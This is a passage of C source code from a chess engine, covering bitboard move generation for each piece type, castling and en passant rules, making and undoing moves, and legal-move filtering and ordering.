0;\n\n\t// Get the valid en passant move as a bitboard\n\tswitch(color) {\n\tcase WHITE:\n\t\tvalid_ep_square = index2bb(position->epSquare) & RANK_6;\n\t\tbreak;\n\tcase BLACK:\n\t\tvalid_ep_square = index2bb(position->epSquare) & RANK_3;\n\t\tbreak;\n\t}\n\n\t// Return the pawn attack bitwise anded with the en passant move\n\treturn pawnAttacks(moving_piece, position->board, color) & valid_ep_square;\n}\n\n// Returns the simple capture bitwise or'ed with the en passant capture\nBitboard pawnCaptures(Bitboard moving_piece, Position * position, char color) {\n return pawnSimpleCaptures(moving_piece, position->board, color) | pawnEpCaptures(moving_piece, position, color);\n}\n\n// Returns the bitwise or of capturing or moving forward with a pawn\nBitboard pawnMoves(Bitboard moving_piece, Position * position, char color) {\n\treturn pawnPushes(moving_piece, position->board, color) | pawnCaptures(moving_piece, position, color);\n}\n\n// Checks to see if a pawn is moving 2 spaces forward\nBOOL isDoublePush(int leaving, int arriving) {\n\tif ( (index2bb(leaving)&RANK_2) && (index2bb(arriving)&RANK_4) )\n\t\treturn TRUE;\n\tif ( (index2bb(leaving)&RANK_7) && (index2bb(arriving)&RANK_5) )\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Retrieves the square at which an en passant move is valid\nchar getEpSquare(int leaving) {\n\t// If the pawn is leaving rank 2, then return the square after the square that was left\n\tif (index2bb(leaving)&RANK_2)\n\t\treturn leaving+8;\n\t// If the pawn was leaving rank 7, return the square before the square that was left\n\tif (index2bb(leaving)&RANK_7)\n\t\treturn leaving-8;\n\treturn -1;\n}\n\n// Checks to see if two same-colored pawns are on the same file (i.e. one behind another)\nBOOL isDoubledPawn(Bitboard position, int board[]) {\n\tchar pieceColor = board[bb2index(position)]&COLOR_MASK;\n\n\tif (countPieces( getPawns(board)&getColoredPieces(board, pieceColor)&fileFilter(position) ) > 1)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if a pawn has no friendly pawn on an adjacent file\nBOOL isIsolatedPawn(Bitboard position, int board[]) {\n\tBitboard sideFiles = fileFilter(east(position) | west(position));\n\tchar pieceColor = board[bb2index(position)]&COLOR_MASK;\n\n\tif (countPieces( getPawns(board)&getColoredPieces(board, pieceColor)&sideFiles ) == 0)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if a pawn is behind all same-color pawns on the adjacent files\nBOOL isBackwardsPawn(Bitboard position, int board[]) {\n\t// Fill all elements to the sides of the current position\n\tBitboard squaresFilter = east(position) | west(position);\n\tchar pieceColor = board[bb2index(position)]&COLOR_MASK;\n\n\t// Fill squaresFilter with a ray going towards the opponent from the current position\n\tif ( pieceColor == BLACK ) {\n\t\tsquaresFilter |= northRay(squaresFilter);\n\t} else {\n\t\tsquaresFilter |= southRay(squaresFilter);\n\t}\n\n\t// If no same-colored pieces are in squaresFilter, then the pawn is backwards\n\tif (countPieces( getPawns(board)&getColoredPieces(board, pieceColor)&squaresFilter ) == 0)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if a pawn has no opposing pawns blocking it from reaching the other side of the board\nBOOL isPassedPawn(Bitboard position, int board[]) {\n\tBitboard squaresFilter = 0;\n\tchar pieceColor = board[bb2index(position)]&COLOR_MASK;\n\n\t// Fill a 3 wide ray going towards the opponent from the current position\n\tif ( pieceColor == BLACK ) {\n\t\tsquaresFilter |= southRay(east(position)) | southRay(west(position)) | southRay(position);\n\t} else {\n\t\tsquaresFilter |= northRay(east(position)) | northRay(west(position)) | northRay(position);\n\t}\n\n\t// If no opposite colored pawns are in that ray, the pawn is not opposed\n\tif (countPieces( getPawns(board)&getColoredPieces(board, opponent(pieceColor))&squaresFilter ) == 0)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if there are no pawns on a given file\nBOOL isOpenFile(Bitboard position, int board[]) {\n\tif (countPieces( getPawns(board)&fileFilter(position) ) == 0)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// Checks to see if there is only one pawn on a given file\nBOOL isSemiOpenFile(Bitboard position, int board[]) {\n\tif (countPieces( getPawns(board)&fileFilter(position) ) == 1)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// ========== KNIGHT =========\n\n// Retrieves all knights on the board\nBitboard getKnights(int board[]) { return getPieces(board, KNIGHT); }\n\n// Returns a bitboard containing all of the valid knight attacks from the current location\nBitboard knightAttacks(Bitboard moving_piece) {\n return NNE(moving_piece) | ENE(moving_piece) |\n NNW(moving_piece) | WNW(moving_piece) |\n SSE(moving_piece) | ESE(moving_piece) |\n SSW(moving_piece) | WSW(moving_piece);\n}\n\n// Returns all of the valid attacks that do not already have a same-colored piece in them\nBitboard knightMoves(Bitboard moving_piece, int board[], char color) {\n return knightAttacks(moving_piece) & not(getColoredPieces(board, color));\n}\n\n// Fills all possible squares a knight can hit within a certain number of jumps\nBitboard knightFill(Bitboard moving_piece, int jumps) {\n\t// Start with moving piece\n\tBitboard fill = moving_piece;\n\tint i;\n\t// For i < jumps\n\tfor (i=0; i<jumps; i++) {\n\t\t// Find knight attacks from current fill, bitwise or the result onto fill\n\t\tfill |= knightAttacks(fill);\n\t}\n\treturn fill;\n}\n\n// Calculates how many moves it will take to reach a square from the current square\nint knightDistance(Bitboard leaving_square, Bitboard arriving_square) {\n\tBitboard fill = leaving_square;\n\tint dist = 0;\n\n\t// While not at the arriving square\n\twhile ((fill & arriving_square) == 0) {\n\t\t// Increment distance (number of moves)\n\t\tdist++;\n\t\t// Add knightAttacks at fill to fill\n\t\tfill |= knightAttacks(fill);\n\t}\n\treturn dist;\n}\n\n// ========== KING ===========\n\n// Gets the location of the king at a given color\nBitboard getKing(int board[], char color) {\n\treturn getPieces(board, KING) & getColoredPieces(board, color);\n}\n\n// Return a bitboard of all king attacks\nBitboard kingAttacks(Bitboard moving_piece) {\n\t// Fill east and west\n\tBitboard kingAtks = moving_piece | east(moving_piece) | west(moving_piece);\n\t// Fill north and south from both\n\tkingAtks |= north(kingAtks) | south(kingAtks);\n\t// Return with center piece removed\n return kingAtks & not(moving_piece);\n}\n\n// Return all king attacks that are not occupied by a same-colored piece\nBitboard kingMoves(Bitboard moving_piece, int board[], char color) {\n return kingAttacks(moving_piece) & not(getColoredPieces(board, color));\n}\n\n// Checks if castling kingside is valid\nBOOL canCastleKingside(Position * position, char color) {\n\tswitch(color) {\n\n\tcase WHITE:\n\t\t// If can castle kingside, all of the pieces are in the right spot, \n\t\t// none of the spaces are under attack, then return true\n\t\tif ( (position->castlingRights&CASTLE_KINGSIDE_WHITE) &&\n\t\t\t (position->board[str2index(\"e1\")] == (WHITE|KING)) &&\n\t\t\t (position->board[str2index(\"f1\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"g1\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"h1\")] == (WHITE|ROOK)) &&\n\t\t\t (!isAttacked(str2bb(\"e1\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"f1\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"g1\"), position->board, opponent(color))) )\n\t\t\treturn TRUE;\n\t\telse\n\t\t\treturn FALSE;\n\n\tcase BLACK:\n\t\t// If can castle kingside, all of the pieces are in the right spot, \n\t\t// none of the spaces are under attack, then return true\n\t\tif ( (position->castlingRights&CASTLE_KINGSIDE_BLACK) &&\n\t\t\t (position->board[str2index(\"e8\")] == (BLACK|KING)) &&\n\t\t\t (position->board[str2index(\"f8\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"g8\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"h8\")] == (BLACK|ROOK)) &&\n\t\t\t (!isAttacked(str2bb(\"e8\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"f8\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"g8\"), position->board, opponent(color))) )\n\t\t\treturn TRUE;\n\t\telse\n\t\t\treturn FALSE;\n\n\t}\n\treturn FALSE;\n}\n\n// Checks if castling queenside is valid\nBOOL canCastleQueenside(Position * position, char color) {\n\tswitch(color) {\n\n\tcase WHITE:\n\t\t// If can castle queenside, all of the pieces are in the right spot, \n\t\t// none of the spaces are under attack, then return true\n\t\tif ( (position->castlingRights&CASTLE_QUEENSIDE_WHITE) &&\n\t\t\t (position->board[str2index(\"a1\")] == (WHITE|ROOK)) &&\n\t\t\t (position->board[str2index(\"b1\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"c1\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"d1\")] == EMPTY) &&\n\t\t\t (position->board[str2index(\"e1\")] == (WHITE|KING)) &&\n\t\t\t (!isAttacked(str2bb(\"c1\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"d1\"), position->board, opponent(color))) &&\n\t\t\t (!isAttacked(str2bb(\"e1\"), position->board, opponent(color))) )\n\t\t\treturn TRUE;\n\t\telse\n\t\t\treturn FALSE;\n\n\tcase BLACK:\n\t\t// If can castle queenside, all of the pieces are in the right spot, \n\t\t// none of the spaces are under attack, then return true\n\t\tif ( (position->castlingRights&CASTLE_QUEENSIDE_BLACK) &&\n\t\t\t\t (position->board[str2index(\"a8\")] == (BLACK|ROOK)) &&\n\t\t\t\t (position->board[str2index(\"b8\")] == EMPTY) &&\n\t\t\t\t (position->board[str2index(\"c8\")] == EMPTY) &&\n\t\t\t\t (position->board[str2index(\"d8\")] == EMPTY) &&\n\t\t\t\t (position->board[str2index(\"e8\")] == (BLACK|KING)) &&\n\t\t\t\t (!isAttacked(str2bb(\"c8\"), position->board, opponent(color))) &&\n\t\t\t\t (!isAttacked(str2bb(\"d8\"), position->board, opponent(color))) &&\n\t\t\t\t (!isAttacked(str2bb(\"e8\"), position->board, opponent(color))) )\n\t\t\treturn TRUE;\n\t\telse\n\t\t\treturn FALSE;\n\n\t}\n\treturn FALSE;\n}\n\n// Removes the right to castle from a piece\nchar removeCastlingRights(char original_rights, char removed_rights) {\n\t// Flips bits of removed rights, bitwise and's it onto the original\n return (char) (original_rights & ~(removed_rights));\n}\n\n// ========== BISHOP =========\n\n// Gets all bishops on the board\nBitboard getBishops(int board[]) { return getPieces(board, BISHOP); }\n\n// Generates a northeastern attack ray from all elements on the passed in bitboard\nBitboard NE_ray(Bitboard bb) {\n\tint i;\n\t// Add first NE ray\n\tBitboard ray = NE(bb);\n\n\t// Add remaining NE rays starting from current ray\n\tfor (i=0; i<6; i++) {\n\t\tray |= NE(ray);\n\t}\n\n\treturn ray & ALL_SQUARES;\n}\n\n// Generates southeastern attack ray from all elements on the passed in bitboard\nBitboard SE_ray(Bitboard bb) {\n\tint i;\n\t// Add first SE ray\n\tBitboard ray = SE(bb);\n\n\t// Add remaining SE rays\n\tfor (i=0; i<6; i++) {\n\t\tray |= SE(ray);\n\t}\n\n\treturn ray & ALL_SQUARES;\n}\n\n// Generates northwestern attack ray from all elements on the passed in bitboard\nBitboard NW_ray(Bitboard bb) {\n\tint i;\n\t// Add first NW ray\n\tBitboard ray = NW(bb);\n\n\t// Add remaining NW rays\n\tfor (i=0; i<6; i++) {\n\t\tray |= NW(ray);\n\t}\n\n\treturn ray & ALL_SQUARES;\n}\n\n// Generates southwestern attack ray from all elements on the passed in bitboard\nBitboard SW_ray(Bitboard bb) {\n\tint i;\n\t// Add first SW ray\n\tBitboard ray = SW(bb);\n\n\t// Add remaining SW rays\n\tfor (i=0; i<6; i++) {\n\t\tray |= SW(ray);\n\t}\n\n\treturn ray & ALL_SQUARES;\n}\n\n// Generates northeastern attack ray from the location of the piece\nBitboard NE_attack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n\tBitboard blocker = lsb(NE_ray(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n\tif (blocker) {\n\t\treturn NE_ray(single_piece) ^ NE_ray(blocker);\n\t} else {\n\t\treturn NE_ray(single_piece);\n\t}\n}\n\n// Generates northwestern attack ray from the location of the piece\nBitboard NW_attack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n\tBitboard blocker = lsb(NW_ray(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n\tif (blocker) {\n\t\treturn NW_ray(single_piece) ^ NW_ray(blocker);\n\t} else {\n\t\treturn NW_ray(single_piece);\n\t}\n}\n\n// Generates southeastern attack ray from the location of the piece\nBitboard SE_attack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n\tBitboard blocker = msb(SE_ray(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n\tif (blocker) {\n\t\treturn SE_ray(single_piece) ^ SE_ray(blocker);\n\t} else {\n\t\treturn SE_ray(single_piece);\n\t}\n}\n\n// Generates southwestern attack ray from the location of the piece\nBitboard SW_attack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n\tBitboard blocker = msb(SW_ray(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n\tif (blocker) {\n\t\treturn SW_ray(single_piece) ^ SW_ray(blocker);\n\t} else {\n\t\treturn SW_ray(single_piece);\n\t}\n}\n\n// Return attack vectors along the sw-ne vector\nBitboard diagonalAttacks(Bitboard single_piece, int board[], char color) {\n return NE_attack(single_piece, board, color) | SW_attack(single_piece, board, color);\n}\n\n// Return attack vectors along the nw-se vector\nBitboard antiDiagonalAttacks(Bitboard single_piece, int board[], char color) {\n return NW_attack(single_piece, board, color) | SE_attack(single_piece, board, color);\n}\n\n// Return both diagonal and anti-diagonal attacks\nBitboard bishopAttacks(Bitboard moving_pieces, int board[], char color) {\n return diagonalAttacks(moving_pieces, board, color) | antiDiagonalAttacks(moving_pieces, board, color);\n}\n\n// Return all bishop attacks that are not occupied by friendly pieces\nBitboard bishopMoves(Bitboard moving_piece, int board[], char color) {\n return bishopAttacks(moving_piece, board, color) & not(getColoredPieces(board, color));\n}\n\n// ========== ROOK ===========\n\n// Find all rooks on the board\nBitboard getRooks(int board[]) { return getPieces(board, ROOK); }\n\n// Generates northern attack ray for all elements on passed-in board\nBitboard northRay(Bitboard moving_pieces) {\n\t// Add first N ray\n Bitboard ray_atks = north(moving_pieces);\n\n int i;\n\t// Add remaining N rays\n for (i=0; i<6; i++) {\n ray_atks |= north(ray_atks);\n }\n\n return ray_atks & ALL_SQUARES;\n}\n\n// Generates southern attack ray for all elements on passed-in board\nBitboard southRay(Bitboard moving_pieces) {\n\t// Add first S ray\n Bitboard ray_atks = south(moving_pieces);\n\n int i;\n\t// Add remaining S rays\n for (i=0; i<6; i++) {\n ray_atks |= south(ray_atks);\n }\n\n return ray_atks & ALL_SQUARES;\n}\n\n// Generates eastern attack ray for all elements on passed-in board\nBitboard eastRay(Bitboard moving_pieces) {\n\t// Add first E ray\n Bitboard ray_atks = east(moving_pieces);\n\n int i;\n\t// Add remaining E rays\n for (i=0; i<6; i++) {\n ray_atks |= east(ray_atks);\n }\n\n return ray_atks & ALL_SQUARES;\n}\n\n// Generates western attack ray for all elements on passed-in board\nBitboard westRay(Bitboard moving_pieces) {\n\t// Add first W ray\n Bitboard ray_atks = west(moving_pieces);\n\n int i;\n\t// Add remaining W rays\n for (i=0; i<6; i++) {\n ray_atks |= west(ray_atks);\n }\n\n return ray_atks & ALL_SQUARES;\n}\n\n// Generates northern attack vector from the location of the piece\nBitboard northAttack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n Bitboard blocker = lsb(northRay(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n if (blocker)\n return northRay(single_piece) ^ northRay(blocker);\n else\n return northRay(single_piece);\n}\n\n// Generates southern attack vector from the location of the piece\nBitboard southAttack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n Bitboard blocker = msb(southRay(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n if (blocker)\n return southRay(single_piece) ^ southRay(blocker);\n else\n return southRay(single_piece);\n}\n\n// Returns northern and southern attack vectors\nBitboard fileAttacks(Bitboard single_piece, int board[], char color) {\n return northAttack(single_piece, board, color) | southAttack(single_piece, board, color);\n}\n\n// Generates eastern attack vector from the location of the piece\nBitboard eastAttack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n Bitboard blocker = lsb(eastRay(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n if (blocker)\n return eastRay(single_piece) ^ eastRay(blocker);\n else\n return eastRay(single_piece);\n}\n\n// Generates western attack vector from the location of the piece\nBitboard westAttack(Bitboard single_piece, int board[], char color) {\n\t// Find pieces blocking the attack\n Bitboard blocker = msb(westRay(single_piece) & getOccupiedSquares(board));\n\n\t// If there is a blocker, return the ray of the piece xor'd with the ray of the blocker\n if (blocker)\n return westRay(single_piece) ^ westRay(blocker);\n else\n return westRay(single_piece);\n}\n\n// Returns eastern and western attack vectors\nBitboard rankAttacks(Bitboard single_piece, int board[], char color) {\n return eastAttack(single_piece, board, color) | westAttack(single_piece, board, color);\n}\n\n// Returns full set of rook attacks (rank and file attack vectors)\nBitboard rookAttacks(Bitboard moving_piece, int board[], char color) {\n return fileAttacks(moving_piece, board, color) | rankAttacks(moving_piece, board, color);\n}\n\n// Return all valid attacks that are not occupied by a same-colored piece\nBitboard rookMoves(Bitboard moving_piece, int board[], char color) {\n return rookAttacks(moving_piece, board, color) & not(getColoredPieces(board, color));\n}\n\n// ========== QUEEN ==========\n\n// Get all queens on the board\nBitboard getQueens(int board[]) { return getPieces(board, QUEEN); }\n\n// Return queen attacks (combiniation of bishop and rook attacks)\nBitboard queenAttacks(Bitboard moving_piece, int board[], char color) {\n return rookAttacks(moving_piece, board, color) | bishopAttacks(moving_piece, board, color);\n}\n\n// Return queen moves (combination of bishop and rook moves)\nBitboard queenMoves(Bitboard moving_piece, int board[], char color) {\n return rookMoves(moving_piece, board, color) | bishopMoves(moving_piece, board, color);\n}\n\n// ======== MAKE MOVE ========\n\n// ==== Move Piece ====\nvoid movePiece(int board[], Move move) {\n\tboard[getTo(move)] = board[getFrom(move)]; // Take the selected, valid, position for the piece and give it the information from the current position.\n\tboard[getFrom(move)] = EMPTY; // Take the previous position and clear it of all piece data.\n}\n\n// ==== Current position information update ====\nvoid updatePosition(Position * newPosition, Position * position, Move move) {\n\tmemcpy(newPosition, position, sizeof(Position)); // Copy information of selected, valid, position.\n\tint leavingSquare = getFrom(move); // Get coordinates of position piece is on.\n\tint arrivingSquare = getTo(move); // Get cordinates of selected position.\n\tint piece = position->board[leavingSquare]; // Get the piece information that is stored on the position it is leaving.\n\n\t// ===== MOVE PIECE =====\n\tmovePiece(newPosition->board, move);\n\n\t// ===== TO MOVE =====\n\tnewPosition->toMove = opponent(position->toMove);\n\n\t// ===== MOVE COUNTS =====\n\t// Half move clock takes care of enforcing the fifty-move rule (in this program 75). The count is reset if a capture happens or a pawn moves.\n\tnewPosition->halfmoveClock += 1; // Add one to the count\n\tif (position->toMove == BLACK) { // If it's black it has negative positions \n\t\tnewPosition->fullmoveNumber += 1;\n\t}\n\n\tif (position->board[arrivingSquare] != EMPTY) {\n\t\tnewPosition->halfmoveClock = 0; // If there is a capture, reset the half move clock\n\t}\n\n\t// ===== PAWNS =====\n\tnewPosition->epSquare = -1;\n\tif ( (piece&PIECE_MASK) == PAWN ) {\n\t\tnewPosition->halfmoveClock = 0; //If a pawn moves, reset the half move clock\n\n\t\tif (arrivingSquare == position->epSquare) {\n\t\t if (index2bb(position->epSquare)&RANK_3) {\n\t\t\t\tnewPosition->board[(int)(position->epSquare+8)] = EMPTY;\n\t\t }\n\n\t\t if (index2bb(position->epSquare)&RANK_6) {\n\t\t \tnewPosition->board[(int)(position->epSquare-8)] = EMPTY;\n\t\t }\n\t\t}\n\n\t\tif (isDoublePush(leavingSquare, arrivingSquare)) {\n\t\t\tnewPosition->epSquare = getEpSquare(leavingSquare);\n\t\t}\n\n\t\tif (index2bb(arrivingSquare)&(RANK_1|RANK_8)) {\n\t\t\tnewPosition->board[arrivingSquare] = position->toMove|QUEEN;\n\t\t}\n\n\t}\n\n\t// ===== CASTLING =====\n\t// Castling rules: \n\t// The kind and the rook may not have moved from their starting position if you want to castle\n\t// All spaces between the king and the rook must be empty\n\t// The king cannot be in check\n\t// The squares that the king passes over myst not be under atack, nor the square where it lands on\n\tif (leavingSquare == str2index(\"a1\")) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_QUEENSIDE_WHITE);\n\t}\n\telse if (leavingSquare == str2index(\"h1\")) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_KINGSIDE_WHITE);\n\t}\n\telse if (leavingSquare == str2index(\"a8\")) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_QUEENSIDE_BLACK);\n\t}\n\telse if (leavingSquare == str2index(\"h8\")) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_KINGSIDE_BLACK);\n\t}\n\n\tif ( piece == (WHITE|KING) ) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, (CASTLE_KINGSIDE_WHITE|CASTLE_QUEENSIDE_WHITE));\n\t\tif (leavingSquare == str2index(\"e1\")) {\n\n\t\t\tif (arrivingSquare == str2index(\"g1\"))\n\t\t\t\tmovePiece(newPosition->board, generateMove(str2index(\"h1\"), str2index(\"f1\")));\n\n if (arrivingSquare == str2index(\"c1\"))\n\t\t\t\tmovePiece(newPosition->board, generateMove(str2index(\"a1\"), str2index(\"d1\")));\n\t\t}\n\t} else if ( piece == (BLACK|KING) ) {\n\t\tnewPosition->castlingRights = removeCastlingRights(newPosition->castlingRights, CASTLE_KINGSIDE_BLACK|CASTLE_QUEENSIDE_BLACK);\n\t\tif (leavingSquare == str2index(\"e8\")) {\n\n\t\t\tif (arrivingSquare == str2index(\"g8\"))\n\t\t\t\tmovePiece(newPosition->board, generateMove(str2index(\"h8\"), str2index(\"f8\")));\n\n if (arrivingSquare == str2index(\"c8\"))\n\t\t\t\tmovePiece(newPosition->board, generateMove(str2index(\"a8\"), str2index(\"d8\")));\n\t\t}\n\t}\n}\n\n// ==== Another move function ====\nvoid makeMove(Game * game, Move move) {\n\tPosition newPosition;\n\tupdatePosition(&newPosition, &(game->position), move); // Move the piece to the next position selected\n\tmemcpy(&(game->position), &newPosition, sizeof(Position)); // Copy the memory of the position onto the next position\n\n\tgame->moveListLen += 1; // List of moves made increases\n\n\t// ===== MOVE LIST =====\n\tgame->moveList[game->moveListLen-1] = move;\n\n\t// ===== POSITION HISTORY =====\n\ttoFen(game->positionHistory[game->moveListLen], &game->position); // Stores each move in \"position history\"\n}\n\n// ==== Unmake move (for undo function) ====\nvoid unmakeMove(Game * game) {\n\tPosition newPosition;\n\tif (game->moveListLen >= 1) { // If the user has made at least one move\n\t\t\tloadFen(&newPosition, game->positionHistory[game->moveListLen-1]); // Get the games move history\n\t\t\tmemcpy(&(game->position), &newPosition, sizeof(Position)); // Get the last move made \n\n\t\t\tgame->moveList[game->moveListLen-1] = 0; // Remove that last move from the list of moves\n\t\t\tmemset(game->positionHistory[game->moveListLen], 0, MAX_FEN_LEN*sizeof(char)); // Make the size of the list the size of the new list\n\n\t\t\tgame->moveListLen -= 1; // Make the list length one less\n\t\t} else { // return to initial game\n\t\t\tloadFen(&newPosition, game->positionHistory[0]); // Else there is no moves to undo\n\t\t\tmemcpy(&(game->position), &newPosition, sizeof(Position));\n\n\t\t\tgame->moveListLen = 0; // The list is size 0\n\t\t\tmemset(game->moveList, 0, MAX_PLYS_PER_GAME*sizeof(int));\n\t\t\tmemset(&game->positionHistory[1], 0, (MAX_PLYS_PER_GAME-1)*MAX_FEN_LEN*sizeof(char));\n\t\t}\n}\n\n// ======== MOVE GEN =========\n// ==== Makes a list of moves ====\nBitboard getMoves(Bitboard movingPiece, Position * position, char color) {\n\tint piece = position->board[bb2index(movingPiece)] & PIECE_MASK;\n\n\tswitch (piece) {\n\tcase PAWN:\n\t\treturn pawnMoves(movingPiece, position, color); // List pawn moves and info\n\tcase KNIGHT:\n\t\treturn knightMoves(movingPiece, position->board, color); // List knight moves and info\n\tcase BISHOP:\n\t\treturn bishopMoves(movingPiece, position->board, color); // List bishop moves and info\n\tcase ROOK:\n\t\treturn rookMoves(movingPiece, position->board, color); // List rook moves and info\n\tcase QUEEN:\n\t\treturn queenMoves(movingPiece, position->board, color); // List queen moves and info \n\tcase KING:\n\t\treturn kingMoves(movingPiece, position->board, color); // List king moves and info\n\t}\n\treturn 0;\n}\n\n// List of legal moves\nint pseudoLegalMoves(Move * moves, Position * position, char color) {\n\tint leavingSquare, arrivingSquare, moveCount = 0;\n\n\tfor (leavingSquare=0; leavingSquare<NUM_SQUARES; leavingSquare++) {\n\t\tint piece = position->board[leavingSquare]; // Get the position of the square the piece is leaving\n\n\t\tif (piece != EMPTY && (piece&COLOR_MASK) == color) { // Get the peices information and the colour of it\n\t\t\tBitboard targets = getMoves(index2bb(leavingSquare), position, color);\n\n\t\t\tfor (arrivingSquare=0; arrivingSquare<NUM_SQUARES; arrivingSquare++) {\n\t\t\t\tif (isSet(targets, arrivingSquare)) {\n\t\t\t\t\tmoves[moveCount++] = generateMove(leavingSquare, arrivingSquare);\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif ( (piece&PIECE_MASK) == KING ) { // If the piece is a king\n\t\t\t\tif (canCastleKingside(position, color)) {\n\t\t\t\t\tmoves[moveCount++] = generateMove(leavingSquare, leavingSquare+2);\n\t\t\t\t}\n\t\t\t\tif (canCastleQueenside(position, color)) {\n\t\t\t\t\tmoves[moveCount++] = generateMove(leavingSquare, leavingSquare-2);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn moveCount;\n}\n\n// ==== Get a list of possible attacks for each piece ==== \nBitboard getAttacks(Bitboard movingPiece, int board[], char color) {\n\tint piece = board[bb2index(movingPiece)] & PIECE_MASK;\n\n\tswitch (piece) {\n\tcase PAWN:\n\t\treturn pawnAttacks(movingPiece, board, color); // Get the pawns information\n\tcase KNIGHT:\n\t\treturn knightAttacks(movingPiece); // Get the knights information\n\tcase BISHOP:\n\t\treturn bishopAttacks(movingPiece, board, color); // Get the bishops information\n\tcase ROOK:\n\t\treturn rookAttacks(movingPiece, board, color); // Get the rooks information\n\tcase QUEEN:\n\t\treturn queenAttacks(movingPiece, board, color); // Get the queens information\n\tcase KING:\n\t\treturn kingAttacks(movingPiece); // Get the kings information\n\t}\n\treturn 0;\n}\n\n// ==== Get the number of attacks ====\nint countAttacks(Bitboard target, int board[], char color) {\n\tint i, attackCount = 0;\n\n\tfor (i=0; i<NUM_SQUARES; i++)\n\t\tif (board[i] != EMPTY && (board[i]&COLOR_MASK) == color)\n\t\t\tif ( getAttacks(index2bb(i), board, color) & target )\n\t\t\t\tattackCount += 1; // Add one to the attack count\n\n\treturn attackCount;\n}\n\n// ==== Was the piece attacked ====\nBOOL isAttacked(Bitboard target, int board[], char color) {\n\tif (countAttacks(target, board, color) > 0) // Get the pieces attack information\n\t\treturn TRUE; // If it was attacked return true\n\telse\n\t\treturn FALSE; // If it wasn't attacked return false\n}\n\n// ==== Checks if it's check ====\nBOOL isCheck(int board[], char color) {\n \treturn isAttacked(getKing(board, color), board, opponent(color)); // Return if the king can be attacked?\n}\n\n// ==== Checks if the move is the legal ====\nBOOL isLegalMove(Position * position, Move move) {\n\tPosition newPosition;\n\tupdatePosition(&newPosition, position, move); // Gets selected position\n\tif ( isCheck(newPosition.board, position->toMove) ) // Did the user move the king into a spot where it will be attacked.\n\t\treturn FALSE;\n\treturn TRUE;\n}\n\n// ==== Returns how many legal moves there are ====\nint legalMoves(Move * legalMoves, Position * position, char color) {\n\tint i, legalCount = 0;\n\n\tMove pseudoMoves[MAX_BRANCHING_FACTOR];\n\tint pseudoCount = pseudoLegalMoves(pseudoMoves, position, color); // Get the number of pseudo legal moves\n\n\tfor (i=0; i<pseudoCount; i++) { \n\t\tif (isLegalMove(position, pseudoMoves[i])) { //For all of the moves, if the move is legal, increase the count by one\n\t\t\tlegalMoves[legalCount++] = pseudoMoves[i];\n\t\t}\n\t}\n\n\treturn legalCount;\n}\n\n// ==== Count of legal moves ====\nint legalMovesCount(Position * position, char color) {\n\tint i, legalCount = 0;\n\n\tMove pseudoMoves[MAX_BRANCHING_FACTOR];\n\tint pseudoCount = pseudoLegalMoves(pseudoMoves, position, color); // Get list of psuedo legal moves \n\n\tfor (i=0; i<pseudoCount; i++) {\n\t\tif (isLegalMove(position, pseudoMoves[i])) { // For that number of moves, if it is a legal move, increment by one\n\t\t\tlegalCount++;\n\t\t}\n\t}\n\n\treturn legalCount;\n}\n\n// ==== List the legal moves in static order ==== \nint staticOrderLegalMoves(Move * orderedLegalMoves, Position * position, char color) {\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint legalCount = legalMoves(moves, position, color); // Get the count of moves from a piece\n\n\tPosition newPosition;\n\tNode nodes[legalCount], orderedNodes[legalCount];\n\n\tint i;\n\tfor (i=0; i<legalCount; i++) {\n\t\tupdatePosition(&newPosition, position, moves[i]); // Make the move\n\t\tnodes[i] = (Node) { .move = moves[i], .score = staticEvaluation(&newPosition) }; // Staticaly evaluate the new move\n\t}\n\n\tsortNodes(orderedNodes, nodes, legalCount, color); // Sort the nodes (moves) in the list\n\n\tfor (i=0; i<legalCount; i++) {\n\t\torderedLegalMoves[i] = 